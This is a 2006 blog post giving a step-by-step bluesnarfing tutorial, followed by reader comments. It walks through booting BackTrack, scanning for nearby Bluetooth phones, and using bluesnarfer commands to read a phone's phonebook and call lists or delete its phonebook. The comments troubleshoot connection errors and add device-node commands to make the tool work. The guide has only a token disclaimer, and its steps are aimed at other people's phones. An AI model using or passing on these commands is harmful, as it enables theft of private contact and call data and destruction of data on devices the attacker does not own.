Bluesnarfing

posted on July 11th, 2006


I don’t know if the following content is illegal or not, but I know that you can use it to do illegal things. I used the information only to find out how secure my $1000 cell phone (the nokia 8800) is and not to harm anyone. If you think you want to harm someone with this information I urge you to leave this site now. Again: Only use this gude for information purposes (eg. finding out how safe your phone is, learning linux)

There are a many bluesnarf applications available and I’m still experimenting with them. Currently I found the method I’m going to describe now the easiest:

NOTE: All lines starting with “slax ~ #” are commands you need to type in a console. Don’t type slax ~ #, only the words after the #.

1. Download backtrack: http://www.remote-exploit.org/index.php/BackTrack.

2. Burn the live cd (the thing you’ve just downloaded), insert it in you computer and reboot. If everything goes well the cd should boot up. If Windows boots, go into your bios and change the first boor device to cd-rom.

3. Login (username = root; password = toor) and type ’startx’ without quotes.

4. Open a console window by clicking the console icon in the bottom left corner of the screen.

optional: If you want to setup a wireless internet connection type in

slax ~ # iwconfig

Find your interface, mine is eth0.

slax ~ # iwconfig essid channel key

slax ~ # dhcpcd

5. Now plug in your blutooth dongle if you haven’t already done it and in the console type in:

slax ~ # hciconfig

Now look how linux calls your bluetooth device. In my case it’s hci0.

slax ~ # hciconfig hci0 up

6. The previous step enabled your device. In this step we are going to search for other devices.

slax ~ # hcitool scan hci0
All found devices will show up. The number are the bluetooth addresses. Mark one of the addresses, right click en choose copy.

7. Now we are really going to bluesnarf using the program bluesnarfer.

slax ~ # /pentest/bluetooth/bluesnarfer-0.1/bluesnarfer [options] [ATCMD] -b bt_addr

I don’t think you know the options, so to make things easier I’ll show you a list of available commands:

ATCMD : valid AT+CMD (GSM EXTENSION)

TYPE : valid phonebook type ..
example : “DC” (dialed call list)
“SM” (SIM phonebook)
“RC” (recevied call list)
“XX” much more

-b bdaddr : bluetooth device address
-C chan : bluetooth rfcomm channel

-c ATCMD : custom action
-r N-M : read phonebook entry N to M
-w N-M : delete phonebook entry N to M
-f name : search “name” in phonebook address
-s TYPE : select phonebook memory storage
-l : list aviable phonebook memory storage
-i : device info

I think the best thing to do is to experiment with the commands, but to get you starting I made some examples:

View the phone’s phonebook:

slax ~ # /pentest/bluetooth/bluesnarfer-0.1/bluesnarfer -r A-Z -b

View the last received calls:

slax ~ # /pentest/bluetooth/bluesnarfer-0.1/bluesnarfer -s RC -r 1-100 -b

Delete the phonebook:

slax ~ # /pentest/bluetooth/bluesnarfer-0.1/bluesnarfer -w A-Z -b

8. That’s all! You are now a professional bluesnarfer! If you get an error it’s possible that your phone is not vulnerable. I found out that this doesn’t work with the previously mentioned Nokia 8800, but I also tested it with an old 6310i and it worked without any problems! I’m currently searching for a better way, a way that works with all phones. Please check back later, if I found a better way I’ll post it on this blog. If you know a better way, please drop me an e-mail or place a comment.

9 comments:

  1. d347hm4n said on March 1st, 2007 at 7:32 pm :

    bluesnarfer -r A-Z -b 00:16:20:34:72:CE
    device name: The Devils Reject
    bluesnarfer: open /dev/bluetooth/rfcomm/0, No such file or directory
    bluesnarfer: bt_rfcomm_config failed
    bluesnarfer: unable to create rfcomm connection
    bluesnarfer: release rfcomm ok

    i have seen all over the internet this or similar message’s does this mean that the hax will not work, it there a workaround? Thx

  2. anotheruser said on March 26th, 2007 at 3:15 pm :

    have you got anything more up to date ?

  3. iddqd said on April 10th, 2007 at 4:18 pm :

    i have same problem with
    bluesnarfer: open /dev/bluetooth/rfcomm/0, No such file or directory
    help please

  4. Powers said on May 13th, 2007 at 3:13 pm :

    try the following:

    mkdir -p /dev/bluetooth/rfcomm
    mknod -m 666 /dev/bluetooth/rfcomm/0 c 216 0

    thats should do it. note assuming bactrack/auditor live cd boot you will have to do this each time you boot or put it into a startup script or somthing.

  5. G said on May 20th, 2007 at 11:09 am :

    Would I need to install a driver for the blue tooth dongle? If so, what dongle would you recommend I purchase,

    since having the wrong model=pain in the ass looking for drivers

    Thanks

  6. G said on May 20th, 2007 at 11:27 am :

    Is this dongle fine: TrendNet TBW-101UB

  7. herm said on May 25th, 2007 at 6:31 pm :

    Help, I have the same issue!

  8. merde said on June 6th, 2007 at 8:38 pm :

    Too bad that the mentioned Nokia 6310i is one of the few phones that is indeed vulnerable (the Ericsson T68i too, if I recall correctly). Just about any phone newer than those won’t be tricked in allowing AT commands without proper authorization.

  9. felix said on September 24th, 2007 at 6:30 pm :

    This doesn’t work with the newest version of backtracker. I’m assuming that’s what it is.

Leave a Reply